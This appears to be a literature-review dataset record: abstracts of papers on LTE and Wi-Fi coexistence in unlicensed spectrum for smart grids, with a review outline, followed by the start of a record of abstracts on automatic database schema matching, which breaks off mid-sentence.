data, many LTE operators are interested in leveraging unlicensed bands to enhance data rates and user experience. Th is paper investigates the problem of the coexistence of LTE and Wi-Fi in 5 GHz unlicensed bands. We fi rst introduce the current rules for the 5 GHz unlicensed bands and the carrier aggregation technique. We then discuss four deployment scenarios and two LTE-unlicensed (LTE-U) coexistence scenarios. Further, we provide a feature comparison between LTE and Wi-Fi in the PHY/MAC layers, and review the coexistence methods for LTE-U and Wi-Fi without or with the Listen- Before-Talk (LBT) mechanism. Th is paper is concluded by an examination of Wi-Fi link aggregation and in-device coexistence issues. --- paper_title: Multi-armed bandit for LTE-U and WiFi coexistence in unlicensed bands paper_content: In order to cope with the phenomenal growth of mobile data traffic, unlicensed spectrum can be utilized by the Long Term Evolution (LTE) cellular systems. However, ensuring fair coexistence with WiFi is a mandatory requirement. In one approach, periodically configurable transmission gaps can be used to facilitate a coexistence between WiFi and LTE. In this paper, a Multi-Armed Bandit (MAB) based dynamic duty cycle selection method is proposed for configuration of transmission gaps ensuring a better coexistence for both technologies. Then the concept is further strengthened with downlink power control mechanism using the same algorithm leading to a high energy efficiency and interference reduction. Performance results are given for different user equipment and WiFi station densities in which it is shown that significant improvements in overall throughput and energy efficiency can be achieved. --- paper_title: Performance Analysis of LAA and WiFi Coexistence in Unlicensed Spectrum Based on Markov Chain paper_content: License-assisted access (LAA) is a candidate feature in 3GPP Rel-13 to meet the explosive growth of traffic demand. The main idea of LAA is to deploy LTE in the unlicensed band (mainly the 5GHz band), which is abundant with available spectrum. However, the major concern is the coexistence between WiFi and LAA in the same band. This paper presents a new framework to evaluate the downlink performance of coexisting LAA and WiFi networks. By using Markov chain, analytical models are established based on WiFi distributed coordination function (DCF) and two listen-before- talk (LBT) schemes. These two LBT schemes are Cat 3 and Cat 4 LBT, which mainly differ in medium access schemes in terms of backoff procedure. Unlike most existing works, which focus on the impact on WiFi performance posed by LAA, the performance of LAA is also evaluated. Our analysis shows that throughput of a WiFi network can be enhanced by adding or replacing WiFi access points (APs) with LAA E-UTRAN Node Bs (eNBs), at the expense of different levels of WiFi performance degradation. A trade-off between WiFi protection and LAA-WiFi system performance enhancement is observed. WiFi throughput and delay are less affected by Cat 4 LBT scheme, while Cat 3 LBT scheme provides higher LAA-WiFi system throughput. The choice of LBT schemes relies on the network planning priority, WiFi performance protection and LAA system performance requirements. --- paper_title: A review of wireless communications for smart grid paper_content: Smart grid is envisioned to meet the 21st century energy requirements in a sophisticated manner with real time approach by integrating the latest digital communications and advanced control technologies to the existing power grid. It will connect the global users through energy efficiency and awareness corridor. This paper presents a comprehensive review of Wireless Communications Technologies (WCTs) for implementation of smart grid in a systematic way. Various network attributes like internet protocol (IP) support, power usage, data rate etc. are considered to compare the communications technologies in smart grid context. Techniques suitable for Home Area Networks (HANs) like ZigBee, Bluetooth, Wi-Fi, 6LoWPAN and Z-Wave are discussed and compared in context of consumer concerns and network attributes. A similar approach in context of utilities concerns is adopted for wireless communications techniques for Neighborhood Area Networks (NANs) which include WiMAX and GSM based cellular standards. Smart grid applications, associated network issues and challenges are elaborated at the end. --- paper_title: Simultaneous transmission opportunities for LTE-LAA smallcells coexisting with WiFi in unlicensed spectrum paper_content: LTE License-Assisted Access (LTE-LAA) in unlicensed spectrum has drawn a lot of attention due to its appealing data traffic offloading potential. However, the coexistence of LTE and WiFi technologies in the same unlicensed bands needs careful design to avoid severe interference between them. In this paper, we propose a coexistence scheme to create opportunities for LTE-LAA small cells and WiFi devices to transmit simultaneously. We combine Multiple Signal Classification (MUSIC) direction of arrival (DOA) estimation with null steering techniques to avoid collisions between LTE-LAA and WiFi transmissions. We assume that the LTE-LAA small cells are equipped with the latest 802.11 receivers for monitoring WiFi transmissions and for capturing simultaneous transmission timing. The performance of the proposed scheme in terms of collision avoidance and channel occupancy time ratio is evaluated via simulations. The results show that with DOA estimation and null steering, LTE-LAA small cells can transmit simultaneously with nearby WiFi devices without causing significant interference to them. As a result, LTE-LAA small cells can gain much more channel access opportunities and longer channel occupancy time while being “invisible” to coexisting WiFi networks. --- paper_title: LAA-based LTE and ZigBee coexistence for unlicensed-band smart grid communications paper_content: The advent of smart grid introduces abundant number of smart meters which require bidirectional reliable communication. The deployment of advanced metering infrastructure (AMI) in smart grid networks will be auspicious if the existing infrastructure of LTE networks can be utilized. On the other hand, use of LTE infrastructure and spectrum by AMIs will further load the already congested broadband wireless networks. Recently, use of the unlicensed spectrum by the LTE technology is seen as a promising approach to offload the existing traffic from the licensed spectrum. In our study, we investigate the coexistence of LTE and ZigBee networks at the unlicensed frequency band of 2.4 GHz. We consider a time division duplexing (TDD)-LTE system accompanied by ZigBee network with FTP traffic model for system level simulations. The simulation results demonstrate that the simultaneous operation of LTE and ZigBee on the 2.4 GHz band reduces ZigBee's performance, but still meets the data communication requirements for AMI as prescribed by Department of Energy (DoE). --- paper_title: Licensed-assisted access for WiFi-LTE coexistence in the unlicensed spectrum paper_content: One of the effective ways to address the exponentially increasing traffic demand in mobile communication systems is to use more spectrum. Although licensed spectrum is always preferable for providing better user experience, unlicensed spectrum can be considered as an effective complement. Before moving into unlicensed spectrum, it is essential to carry out proper coexistence performance evaluations. In this paper, we analyze WiFi 802.11n and Long Term Evolution (LTE) coexistence performance considering multi-layer cell layouts through system level simulations. We consider a time division duplexing (TDD)-LTE system with an FTP traffic model for performance evaluation. Simulation results show that WiFi performance is more vulnerable to LTE interference, while LTE performance is degraded only slightly. However, WiFi throughput degradation is lower for TDD configurations with larger number of LTE uplink sub-frames and smaller path loss compensation factors. --- paper_title: Hybrid Wi-Fi/LTE aggregation architecture for smart meter communications paper_content: The 3GPP Long Term Evolution (LTE) technology and its evolutions are promising candidate technologies to support smart meter communications. However, smart meter traffic is uplink heavy and needs large number of simultaneously connected users. This reduces LTE's potential to be employed for smart meter communications. To improve the overall performance, in this paper, we propose a hybrid WiFi-LTE aggregation data communication architecture. Specifically, two IEEE 802.11 based layers (IEEE 802.11b/g/n and IEEE 802.11s) are added to the bottom of the LTE architecture to aggregate local smart grid data and pass the aggregated data through limited number of LTE enabled nodes. These hybrid network architectures are evaluated using extensive ns-3 simulations, and their performance are compared with baseline LTE under smart grid traffic profile. Results show that proposed architectures can improve control channel and random access channel performance, at the cost of tolerable latency degradation. --- paper_title: Efficient Coexistence of LTE With WiFi in the Licensed and Unlicensed Spectrum Aggregation paper_content: The exploitation of unlicensed bands by the LTE-advanced (LTE-A) system has become a reality through the proposal of licensed assisted access (LAA) that relies on the carrier aggregation concept within the 3GPP framework. The efficient coexistence of LTE-A and WiFi in the unlicensed spectrum bands requires advanced intelligent techniques. This paper first investigates the concept of LAA, which consists of four main functionalities: 1) carrier selection (CS); 2) listen-before-talk; 3) discontinuous transmission (DTX); and 4) transmit power control (TPC). Second, the LAA functionality implementation is provided using an open source LTE-A downlink link level simulator. Third, we devise an enhanced learning technique for CS and DTX for efficient coexistence among LTE-A and WiFi users. In particular, we provide a Q-learning mechanism for the advanced learning of the unlicensed band activity resulting in the efficient coexistence. Finally, we enhance the coexistence further through a double Q-learning method as a proposal for CS that takes into account both DTX and TPC improving both LTE and WiFi performance. Simulation results are provided for all the use cases that reveal the benefit of exploiting unlicensed bands in next generation mobile cellular networks. --- paper_title: Experimental study of concurrent transmission in wireless sensor networks paper_content: We undertake a systematic experimental study of the effects of concurrent packet transmissions in low-power wireless networks. Our measurements, conducted with Mica2 motes equipped with CC1000 radios, confirm that guaranteeing successful packet reception with high probability in the presence of concurrent transmissions requires that the signal-to-interference-plus-noise-ratio (SINR) exceed a critical threshold. However, we find a significant variation of about 6 dB in the threshold for groups of radios operating at different transmission powers. We find that it is harder to estimate the level of interference in the presence of multiple interferers. We also find that the measured SINR threshold generally increases with the number of interferers. Our study offers a better understanding of concurrent transmissions and suggests richer interference models and useful guidelines to improve the design and analysis of higher layer protocols. --- paper_title: Efficient Coexistence of LTE With WiFi in the Licensed and Unlicensed Spectrum Aggregation paper_content: The exploitation of unlicensed bands by the LTE-advanced (LTE-A) system has become a reality through the proposal of licensed assisted access (LAA) that relies on the carrier aggregation concept within the 3GPP framework. The efficient coexistence of LTE-A and WiFi in the unlicensed spectrum bands requires advanced intelligent techniques. This paper first investigates the concept of LAA, which consists of four main functionalities: 1) carrier selection (CS); 2) listen-before-talk; 3) discontinuous transmission (DTX); and 4) transmit power control (TPC). Second, the LAA functionality implementation is provided using an open source LTE-A downlink link level simulator. Third, we devise an enhanced learning technique for CS and DTX for efficient coexistence among LTE-A and WiFi users. In particular, we provide a Q-learning mechanism for the advanced learning of the unlicensed band activity resulting in the efficient coexistence. Finally, we enhance the coexistence further through a double Q-learning method as a proposal for CS that takes into account both DTX and TPC improving both LTE and WiFi performance. Simulation results are provided for all the use cases that reveal the benefit of exploiting unlicensed bands in next generation mobile cellular networks. --- paper_title: Multi-armed bandit for LTE-U and WiFi coexistence in unlicensed bands paper_content: In order to cope with the phenomenal growth of mobile data traffic, unlicensed spectrum can be utilized by the Long Term Evolution (LTE) cellular systems. However, ensuring fair coexistence with WiFi is a mandatory requirement. In one approach, periodically configurable transmission gaps can be used to facilitate a coexistence between WiFi and LTE. In this paper, a Multi-Armed Bandit (MAB) based dynamic duty cycle selection method is proposed for configuration of transmission gaps ensuring a better coexistence for both technologies. Then the concept is further strengthened with downlink power control mechanism using the same algorithm leading to a high energy efficiency and interference reduction. Performance results are given for different user equipment and WiFi station densities in which it is shown that significant improvements in overall throughput and energy efficiency can be achieved. --- paper_title: LTE in the unlicensed spectrum: Evaluating coexistence mechanisms paper_content: The Long Term Evolution (LTE) in unlicensed spectrum is an emerging topic in the 3rd Generation Partnership Project (3GPP), which is about an operation of the LTE system in the unlicensed spectrum via license-assisted carrier aggregation. The 5 GHz Unlicensed National Information Infrastructure (U-NII) bands are currently under consideration, but these bands are also occupied by Wireless Local Area Networks (WLAN), specifically those based on the IEEE 802.11a/n/ac technologies. Therefore, an appropriate coexistence mechanism must be augmented to guarantee a peaceful coexistence with the incumbent systems. With this regard, our focus lies on the evaluation of all the proposed coexistence mechanisms so far in a single framework and making a fair comparison of them. The coexistence mechanisms covered in this work includes static muting, listen-before-talk (LBT), and other sensing-based schemes that make a use of the existing WLAN channel reservation protocol. --- paper_title: Hybrid Wi-Fi/LTE aggregation architecture for smart meter communications paper_content: The 3GPP Long Term Evolution (LTE) technology and its evolutions are promising candidate technologies to support smart meter communications. However, smart meter traffic is uplink heavy and needs large number of simultaneously connected users. This reduces LTE's potential to be employed for smart meter communications. To improve the overall performance, in this paper, we propose a hybrid WiFi-LTE aggregation data communication architecture. Specifically, two IEEE 802.11 based layers (IEEE 802.11b/g/n and IEEE 802.11s) are added to the bottom of the LTE architecture to aggregate local smart grid data and pass the aggregated data through limited number of LTE enabled nodes. These hybrid network architectures are evaluated using extensive ns-3 simulations, and their performance are compared with baseline LTE under smart grid traffic profile. Results show that proposed architectures can improve control channel and random access channel performance, at the cost of tolerable latency degradation. --- paper_title: Frequency band for HAN and NAN communication in Smart Grid paper_content: Smart Grid metering and control applications require fast and secured two-way communication. IEEE 802.15.4 based ZigBee is one of the leading communication protocols for Advanced Metering Infrastructure (AMI). In North America, ZigBee supports two distinguished frequency bands — 915MHz and 2.4GHz. In Home Area Network (HAN) of AMI, home appliances communicate with smart meters whereas the communication among neighboring meters is termed as Neighborhood Area Network (NAN). In this study, optimum frequency bands for NAN and HAN communication have been proposed based on the throughput, reliability and scalability. We evaluated and compared the performance of bands 868/915MHz and 2.4GHz for AMI context. The solution also meets the requirements for Smart Grid communication standards as recommended by the US Department of Energy (DOE). --- paper_title: Multi-armed bandit for LTE-U and WiFi coexistence in unlicensed bands paper_content: In order to cope with the phenomenal growth of mobile data traffic, unlicensed spectrum can be utilized by the Long Term Evolution (LTE) cellular systems. However, ensuring fair coexistence with WiFi is a mandatory requirement. In one approach, periodically configurable transmission gaps can be used to facilitate a coexistence between WiFi and LTE. In this paper, a Multi-Armed Bandit (MAB) based dynamic duty cycle selection method is proposed for configuration of transmission gaps ensuring a better coexistence for both technologies. Then the concept is further strengthened with downlink power control mechanism using the same algorithm leading to a high energy efficiency and interference reduction. Performance results are given for different user equipment and WiFi station densities in which it is shown that significant improvements in overall throughput and energy efficiency can be achieved. --- paper_title: Licensed-assisted access for WiFi-LTE coexistence in the unlicensed spectrum paper_content: One of the effective ways to address the exponentially increasing traffic demand in mobile communication systems is to use more spectrum. Although licensed spectrum is always preferable for providing better user experience, unlicensed spectrum can be considered as an effective complement. Before moving into unlicensed spectrum, it is essential to carry out proper coexistence performance evaluations. In this paper, we analyze WiFi 802.11n and Long Term Evolution (LTE) coexistence performance considering multi-layer cell layouts through system level simulations. We consider a time division duplexing (TDD)-LTE system with an FTP traffic model for performance evaluation. Simulation results show that WiFi performance is more vulnerable to LTE interference, while LTE performance is degraded only slightly. However, WiFi throughput degradation is lower for TDD configurations with larger number of LTE uplink sub-frames and smaller path loss compensation factors. --- paper_title: Efficient Coexistence of LTE With WiFi in the Licensed and Unlicensed Spectrum Aggregation paper_content: The exploitation of unlicensed bands by the LTE-advanced (LTE-A) system has become a reality through the proposal of licensed assisted access (LAA) that relies on the carrier aggregation concept within the 3GPP framework. The efficient coexistence of LTE-A and WiFi in the unlicensed spectrum bands requires advanced intelligent techniques. This paper first investigates the concept of LAA, which consists of four main functionalities: 1) carrier selection (CS); 2) listen-before-talk; 3) discontinuous transmission (DTX); and 4) transmit power control (TPC). Second, the LAA functionality implementation is provided using an open source LTE-A downlink link level simulator. Third, we devise an enhanced learning technique for CS and DTX for efficient coexistence among LTE-A and WiFi users. In particular, we provide a Q-learning mechanism for the advanced learning of the unlicensed band activity resulting in the efficient coexistence. Finally, we enhance the coexistence further through a double Q-learning method as a proposal for CS that takes into account both DTX and TPC improving both LTE and WiFi performance. Simulation results are provided for all the use cases that reveal the benefit of exploiting unlicensed bands in next generation mobile cellular networks. --- paper_title: Frequency band for HAN and NAN communication in Smart Grid paper_content: Smart Grid metering and control applications require fast and secured two-way communication. IEEE 802.15.4 based ZigBee is one of the leading communication protocols for Advanced Metering Infrastructure (AMI). In North America, ZigBee supports two distinguished frequency bands — 915MHz and 2.4GHz. In Home Area Network (HAN) of AMI, home appliances communicate with smart meters whereas the communication among neighboring meters is termed as Neighborhood Area Network (NAN). In this study, optimum frequency bands for NAN and HAN communication have been proposed based on the throughput, reliability and scalability. We evaluated and compared the performance of bands 868/915MHz and 2.4GHz for AMI context. The solution also meets the requirements for Smart Grid communication standards as recommended by the US Department of Energy (DOE). --- paper_title: Modeling and Analyzing the Coexistence of Licensed-Assisted Access LTE and Wi-Fi paper_content: Licensed-assisted access (LAA) is a feature of Long-Term Evolution (LTE) which enables operation in the unlicensed spectrum. LAA guarantees fair coexistence with Wi-Fi by implementing the listen- before-talk (LBT) mechanism. In this paper, we leverage stochastic geometry to characterize key performance metrics of neighboring LAA and Wi-Fi networks. Our analysis is focused on a single unlicensed frequency band, where the locations for coexisting LTE eNodeBs (eNBs) and Wi-Fi access points (APs) are modeled as two independent homogeneous Poisson point processes (PPPs). Based on an analytical modeling of the channel access procedure, we have derived the medium access probability (MAP), the signal-to- interference-plus-noise ratio (SINR) distribution, the density of successful transmissions (DST), and the data rate distribution for both LAA and Wi-Fi. We show that compared to the baseline scenario where Wi-Fi coexists with an additional Wi-Fi network, LAA can improve the DST and data rate performance of Wi-Fi by adopting more sensitive clear channel assessment thresholds and/or larger contention window sizes. Meanwhile, LAA is demonstrated to achieve acceptable data rate performance despite using LBT. --- paper_title: A SURVEY OF LTE WI-FI COEXISTENCE IN UNLICENSED BANDS paper_content: With the rapid growth of mobile data, many LTE operators are interested in leveraging unlicensed bands to enhance data rates and user experience. Th is paper investigates the problem of the coexistence of LTE and Wi-Fi in 5 GHz unlicensed bands. We fi rst introduce the current rules for the 5 GHz unlicensed bands and the carrier aggregation technique. We then discuss four deployment scenarios and two LTE-unlicensed (LTE-U) coexistence scenarios. Further, we provide a feature comparison between LTE and Wi-Fi in the PHY/MAC layers, and review the coexistence methods for LTE-U and Wi-Fi without or with the Listen- Before-Talk (LBT) mechanism. Th is paper is concluded by an examination of Wi-Fi link aggregation and in-device coexistence issues. --- paper_title: Simultaneous transmission opportunities for LTE-LAA smallcells coexisting with WiFi in unlicensed spectrum paper_content: LTE License-Assisted Access (LTE-LAA) in unlicensed spectrum has drawn a lot of attention due to its appealing data traffic offloading potential. However, the coexistence of LTE and WiFi technologies in the same unlicensed bands needs careful design to avoid severe interference between them. In this paper, we propose a coexistence scheme to create opportunities for LTE-LAA small cells and WiFi devices to transmit simultaneously. We combine Multiple Signal Classification (MUSIC) direction of arrival (DOA) estimation with null steering techniques to avoid collisions between LTE-LAA and WiFi transmissions. We assume that the LTE-LAA small cells are equipped with the latest 802.11 receivers for monitoring WiFi transmissions and for capturing simultaneous transmission timing. The performance of the proposed scheme in terms of collision avoidance and channel occupancy time ratio is evaluated via simulations. The results show that with DOA estimation and null steering, LTE-LAA small cells can transmit simultaneously with nearby WiFi devices without causing significant interference to them. As a result, LTE-LAA small cells can gain much more channel access opportunities and longer channel occupancy time while being “invisible” to coexisting WiFi networks. --- paper_title: Licensed-assisted access for WiFi-LTE coexistence in the unlicensed spectrum paper_content: One of the effective ways to address the exponentially increasing traffic demand in mobile communication systems is to use more spectrum. Although licensed spectrum is always preferable for providing better user experience, unlicensed spectrum can be considered as an effective complement. Before moving into unlicensed spectrum, it is essential to carry out proper coexistence performance evaluations. In this paper, we analyze WiFi 802.11n and Long Term Evolution (LTE) coexistence performance considering multi-layer cell layouts through system level simulations. We consider a time division duplexing (TDD)-LTE system with an FTP traffic model for performance evaluation. Simulation results show that WiFi performance is more vulnerable to LTE interference, while LTE performance is degraded only slightly. However, WiFi throughput degradation is lower for TDD configurations with larger number of LTE uplink sub-frames and smaller path loss compensation factors. --- paper_title: A review of wireless communications for smart grid paper_content: Smart grid is envisioned to meet the 21st century energy requirements in a sophisticated manner with real time approach by integrating the latest digital communications and advanced control technologies to the existing power grid. It will connect the global users through energy efficiency and awareness corridor. This paper presents a comprehensive review of Wireless Communications Technologies (WCTs) for implementation of smart grid in a systematic way. Various network attributes like internet protocol (IP) support, power usage, data rate etc. are considered to compare the communications technologies in smart grid context. Techniques suitable for Home Area Networks (HANs) like ZigBee, Bluetooth, Wi-Fi, 6LoWPAN and Z-Wave are discussed and compared in context of consumer concerns and network attributes. A similar approach in context of utilities concerns is adopted for wireless communications techniques for Neighborhood Area Networks (NANs) which include WiMAX and GSM based cellular standards. Smart grid applications, associated network issues and challenges are elaborated at the end. ---
Title: LTE and Wi−Fi Coexistence in Unlicensed Spectrum with Application to Smart Grid: A Review Section 1: INTRODUCTION Description 1: This section introduces the motivations behind LTE and Wi−Fi coexistence in unlicensed spectrum, emphasizing the increasing data traffic from smart devices and smart grid networks. Section 2: Wi-Fi Technology Description 2: This section covers the basic principles and operational mechanisms of Wi-Fi technology, including its advantages and MAC layer mechanisms. Section 3: LTE Technology Description 3: This section explains the fundamentals of LTE technology, its architecture, and the types of LTE deployment in unlicensed spectrum. Section 4: COEXISTENCE CHALLENGES IN SMART GRID Description 4: This section discusses the challenges faced in the coexistence of Wi-Fi and LTE within smart grid communication networks, highlighting interference and compatibility issues. Section 5: COEXISTENCE MECHANISM Description 5: This section presents two LTE-U coexistence scenarios: coexistence between Wi-Fi and LTE and coexistence between LTE of different operators, explaining why different mechanisms are necessary. Section 6: LTE vs Wi-Fi Description 6: This section examines the coexistence between Wi-Fi and LTE, discussing the differences in radio frame structure, transmission scheduling, and their impact on channel usage. Section 7: LTE-U vs LTE-U Description 7: This section explores the coexistence issues between LTE-Us from different operators, focusing on the interference and coordination required for spectrum efficiency. Section 8: TECHNIQUES FOR COEXISTENCE Description 8: This section reviews various techniques developed for coexistence, both with and without regulatory Listen Before Talk (LBT) requirements, and their effectiveness. Section 9: Coexistence without LBT Description 9: This section details coexistence mechanisms in countries without LBT requirements, including Channel Selection, Carrier-Sensing-Adaptive Transmission, and Opportunistic Supplementary Downlink. Section 10: Coexistence Based on LBT Mechanism Description 10: This section discusses coexistence mechanisms that adhere to LBT regulations, including Frame-based Equipment and Load-based Equipment methods. Section 11: CONCLUSION Description 11: This section summarizes the key findings of the paper, offering insights into how coexistence mechanisms can ensure fair and efficient use of unlicensed spectrum in smart grid communication networks.
A survey of approaches to automatic schema matching
10
--- paper_title: Data warehouse scenarios for model management paper_content: Model management is a framework for supporting meta-data related applications where models and mappings are manipulated as first class objects using operations such as Match, Merge, ApplyFunction, and Compose. To demonstrate the approach, we show how to use model management in two scenarios related to loading data warehouses. The case study illustrates the value of model management as a methodology for approaching meta-data related problems. It also helps clarify the required semantics of key operations. These detailed scenarios provide evidence that generic model management is useful and, very likely, implementable. --- paper_title: Issues and approaches of database integration paper_content: In many large companies the widespread usage of computers has led a number of different application-specific databases to be installed. As company structures evolve, boundaries between departments move, creating new business units. Their new applications will use existing data from various data stores, rather than new data entering the organization. Henceforth, the ability to make data stores interoperable becomes a crucial factor for the development of new information systems. Data interoperability may come in various degrees. At the lowest level, commercial gateways connect specific pairs of database management systems (DBMSs). Software providing facilities for defining persistent views over different databases [6] simplifies access to distant data but does not support automatic enforcement of consistency constraints among different databases. Full interoperability is achieved by distributed or federated database systems, which support integration of existing data into virtual databases (i.e. databases which are logically defined but not physically materialized). The latter allow existing databases to remain under control of their respective owners, thus supporting a harmonious coexistence of scalable data integration and site autonomy requirements [9]. Federated systems are very popular today. However, before they become marketable, many issues remain to be solved. Design issues focus on either human-centered aspects (cooperative work, including autonomy issues and negotiation procedures) or database-centered aspects (data integration, schema/database evolution). Operational issues investigate system interoperability mainly in terms of support of new transaction types, new query processing algorithms, security concerns, etc. General overviews may be found elsewhere [4, 9]. This paper is devoted to database integration, possibly the most critical issue. Simply stated, database integration is the process which takes as input a set of databases, and produces as output a single unified description of the input schemas (the integrated schema) and the associated mapping information supporting integrated access to existing data through the integrated schema. As such, database integration is also used in the process of re-engineering an exist i ng l egacy system. Database integration has attracted many diverse and diverging contributions. The purpose, and the main intended contribution of this article is to provide a clear picture of what are the approaches and the current solutions and what remains to be achieved. --- paper_title: A comparative analysis of methodologies for database schema integration paper_content: One of the fundamental principles of the database approach is that a database allows a nonredundant, unified representation of all data managed in an organization. This is achieved only when methodologies are available to support integration across organizational and application boundaries. Methodologies for database design usually perform the design activity by separately producing several schemas, representing parts of the application, which are subsequently merged. Database schema integration is the activity of integrating the schemas of existing or proposed databases into a global, unified schema. The aim of the paper is to provide first a unifying framework for the problem of schema integration, then a comparative review of the work done thus far in this area. Such a framework, with the associated analysis of the existing approaches, provides a basis for identifying strengths and weaknesses of individual methodologies, as well as general guidelines for future improvements and extensions. --- paper_title: Federated database systems for managing distributed, heterogeneous, and autonomous databases paper_content: A federated database system (FDBS) is a collection of cooperating database systems that are autonomous and possibly heterogeneous. In this paper, we define a reference architecture for distributed database management systems from system and schema viewpoints and show how various FDBS architectures can be developed. We then define a methodology for developing one of the popular architectures of an FDBS. Finally, we discuss critical issues related to developing and operating an FDBS. --- paper_title: Data warehouse scenarios for model management paper_content: Model management is a framework for supporting meta-data related applications where models and mappings are manipulated as first class objects using operations such as Match, Merge, ApplyFunction, and Compose. To demonstrate the approach, we show how to use model management in two scenarios related to loading data warehouses. The case study illustrates the value of model management as a methodology for approaching meta-data related problems. It also helps clarify the required semantics of key operations. These detailed scenarios provide evidence that generic model management is useful and, very likely, implementable. --- paper_title: Data warehouse scenarios for model management paper_content: Model management is a framework for supporting meta-data related applications where models and mappings are manipulated as first class objects using operations such as Match, Merge, ApplyFunction, and Compose. To demonstrate the approach, we show how to use model management in two scenarios related to loading data warehouses. The case study illustrates the value of model management as a methodology for approaching meta-data related problems. It also helps clarify the required semantics of key operations. These detailed scenarios provide evidence that generic model management is useful and, very likely, implementable. --- paper_title: A theory of attributed equivalence in databases with application to schema integration paper_content: The authors present a common foundation for integrating pairs of entity sets, pairs of relationship sets, and an entity set with a relationship set. This common foundation is based on the basic principle of integrating attributes. Any pair of objects whose identifying attributes can be integrated can themselves be integrated. Several definitions of attribute equivalence are presented. These definitions can be used to specify the exact nature of the relationship between a pair of attributes. Based on these definitions, several strategies for attribute integration are presented and evaluated. > --- paper_title: Automated resolution of semantic heterogeneity in multidatabases paper_content: A multidatabase system provides integrated access to heterogeneous, autonomous local databases in a distributed system. An important problem in current multidatabase systems is identification of semantically similar data in different local databases. The Summary Schemas Model (SSM) is proposed as an extension to multidatabase systems to aid in semantic identification. The SSM uses a global data structure to abstract the information available in a multidatabase system. This abstracted form allows users to use their own terms (imprecise queries) when accessing data rather than being forced to use system-specified terms. The system uses the global data structure to match the user's terms to the semantically closest available system terms. A simulation of the SSM is presented to compare imprecise-query processing with corresponding query-processing costs in a standard multidatabase system. The costs and benefits of the SSM are discussed, and future research directions are presented. --- paper_title: A theory of attributed equivalence in databases with application to schema integration paper_content: The authors present a common foundation for integrating pairs of entity sets, pairs of relationship sets, and an entity set with a relationship set. This common foundation is based on the basic principle of integrating attributes. Any pair of objects whose identifying attributes can be integrated can themselves be integrated. Several definitions of attribute equivalence are presented. These definitions can be used to specify the exact nature of the relationship between a pair of attributes. Based on these definitions, several strategies for attribute integration are presented and evaluated. > --- paper_title: SYSTEM/U: a database system based on the universal relation assumption paper_content: System/U is a universal relation database system under development at Standford University which uses the language C on UNIX. The system is intended to test the use of the universal view, in which the entire database is seen as one relation. This paper describes the theory behind System/U, in particular the theory of maximal objects and the connection between a set of attributes. We also describe the implementation of the DDL (Data Description Language) and the DML (Data Manipulation Language), and discuss in detail how the DDL finds maximal objects and how the DML determines the connection between the attributes that appear in a query. --- paper_title: DataGuides : Enabling Query Formulation and Optimization in Semistructured Databases * paper_content: In semistructured databases there is no schema fixed in advance. To provide the benefits of a schema in such environments, we introduce DataGuides: concise and accurate structural summaries of semistructured databases. DataGuides serve as dynamic schemas, generated from the database; they are useful for browsing database structure, formulating queries, storing information such as statistics and sample values, and enabling query optimization. This paper presents the theoretical foundations of DataGuides along with an algorithm for their creation and an overview of incremental maintenance. We provide performance results based on our implementation of DataGuides in the Lore DBMS for semistructured data. We also describe the use of DataGuides in Lore, both in the user interface to enable structure browsing and query formulation, and as a means of guiding the query processor and optimizing query execution. --- paper_title: Multifaceted exploitation of metadata for attribute match discovery in information integration paper_content: Automating semantic matching of attributes for the purpose of information integration is challenging, and the dynamics of the Web further exacerbate this problem. Believing that many facets of metadata can contribute to a resolution, we present a framework for multifaceted exploitation of metadata in which we gather information about potential matches from various facets of metadata and combine this information to generate and place confidence values on potential attribute matches. To make the framework apply in the highly dynamic Web environment, we base our process largely on machine learning. Experiments we have conducted are encouraging, showing that when the combination of facets converges as expected, the results are highly reliable. --- paper_title: Experience with a Combined Approach to Attribute-Matching Across Heterogeneous Databases paper_content: Determining attribute correspondences is a difficult, time-consuming, knowledge-intensive part of database integration. We report on experiences with tools that identified candidate correspondences, as a step in a large scale effort to improve communication among Air Force systems. First, we describe a new method that was both simple and surprisingly successful: Data dictionary and catalog information were dumped to unformatted text; then off-the-shelf information retrieval software estimated string similarity, generated candidate matches, and provided the interface. The second method used a different set of clues, such as statistics on database populations, to compute separate similarity metrics (using neural network techniques). We report on substantial use of the first tool, and then report some limited initial experiments that examine the two techniques’ accuracy, consistency and complementarity. --- paper_title: Global viewing of heterogeneous data sources paper_content: The problem of defining global views of heterogeneous data sources to support querying and cooperation activities is becoming more and more important due to the availability of multiple data sources within complex organizations and in global information systems. Global views are defined to provide a unified representation of the information in the different sources by analyzing conceptual schemas associated with them and resolving possible semantic heterogeneity. We propose an affinity based unification method for global view construction. In the method: (1) the concept of affinity is introduced to assess the level of semantic relationship between elements in different schemas by taking into account semantic heterogeneity; (2) schema elements are classified by affinity levels using clustering procedures so that their different representations can be analyzed for unification; (3) global views are constructed starting from selected clusters by unifying representations of their elements. Experiences of applying the proposed unification method and the associated tool environment ARTEMIS on databases of the Italian Public Administration information systems are described. --- paper_title: Using Schema Matching to Simplify Heterogeneous Data Translation paper_content: A broad spectrum of data is available on the Web in distinct heterogeneous sources, and stored under different formats. As the number of systems that utilize this heterogeneous data grows, the importance of data translation and conversion mechanisms increases greatly. In this paper we present a new translation system, based on schema-matching, aimed at simplifying the intricate task of data conversion. We observe that in many cases the schema of the data in the source system is very similar to that of the target system. In such cases, much of the translation work can be done automatically, based on the schemas similarity. This saves a lot of effort for the user, limiting the amount of programming needed. We define common schema and data models, in which schemas and data (resp.) from many common models can be represented. Using a rule-based method, the source schema is compared with the target one, and each component in the source schema is matched with a corresponding component in the target schema. Then, based on the matching achieved, data instances of the source schema can be translated to instances of the target schema. We show that our schema-based translation system allows a convenient specification and customization of data conversions, and can be easily combined with the traditional data-based translation languages. --- paper_title: Generic Schema Matching with Cupid paper_content: Schema matching is a critical step in many applications, such as XML message mapping, data warehouse loading, and schema integration. In this paper, we investigate algorithms for generic schema matching, outside of any particular data model or application. We first present a taxonomy for past solutions, showing that a rich range of techniques is available. We then propose a new algorithm, Cupid, that discovers mappings between schema elements based on their names, data types, constraints, and schema structure, using a broader set of techniques than past approaches. Some of our innovations are the integrated use of linguistic and structural matching, context-dependent matching of shared types, and a bias toward leaf structure where much of the schema content resides. After describing our algorithm, we present experimental results that compare Cupid to two other schema matching systems. --- paper_title: The Clio project: managing heterogeneity paper_content: Clio is a system for managing and facilitating the complex tasks of heterogeneous data transformation and integration. In Clio, we have collected together a powerful set of data management techniques that have proven invaluable in tackling these difficult problems. In this paper, we present the underlying themes of our approach and present a brief case study. --- paper_title: Data-driven understanding and refinement of schema mappings paper_content: At the heart of many data-intensive applications is the problem of quickly and accurately transforming data into a new form. Database researchers have long advocated the use of declarative queries for this process. Yet tools for creating, managing and understanding the complex queries necessary for data transformation are still too primitive to permit widespread adoption of this approach. We 